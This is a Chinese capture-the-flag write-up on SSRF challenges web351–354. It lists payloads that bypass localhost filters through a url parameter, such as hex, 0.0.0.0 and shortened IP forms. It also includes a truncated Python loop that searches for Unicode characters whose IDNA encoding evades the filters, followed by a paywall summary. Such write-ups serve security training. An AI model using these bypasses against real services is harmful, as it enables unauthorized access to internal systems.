前言
开始学习SSRF,学习文章:
SSRF 学习记录(需要fq)
比较简单的题目就直接放payload了,不做解释。
web351
url=http://127.0.0.1/flag.php
web352
scheme必须是http或者https,但是不能有127.0.0.1或者localhost。这个绕过技巧很多了,列具一些常用的吧:
- 进制绕过
url=http://0x7F000001/flag.php - 0.0.0.0绕过
url=http://0.0.0.0/flag.php - 短标签绕过,但是这题我测试失败了,可能是我短标签的问题?
- ipv6绕过[::1],这题也不行。
- 使用句号绕过:
url=http://127。0。0。1/flag.php,这题也不行。 - 特殊的地址0,
url=http://0/flag.php,还有url=http://127.1/flag.php,还有url=http://127.0000000000000.001/flag.php这样的。 - dns重绑定其实也能用在这里,不过这题好像不行?不知道是不是我DNS的那个有问题。
- 可能还有吧,想到了再补上。
web353
同上。
web354
把0和1都给ban了就不知道该怎么办了,看了一下yu师傅的博客,这题的本意是unicode的替换:
for i in range(128,65537):
tmp=chr(i)
try:
res = tmp.encode('idna').decode('utf-8')
#print(res)
if("-") in res:
continue
print

本文探讨了SSRF学习过程中的各种技巧,如进制绕过、特殊地址利用、域名重定向、IDNA编码限制突破、URL协议和路径限制,以及利用DNS重绑定和302跳转进行攻击。重点介绍了如何通过Python工具Gopherus和手动编码实现RCE和Redis Shell写入。
最低0.47元/天 解锁文章
2600

被折叠的 条评论
为什么被折叠?



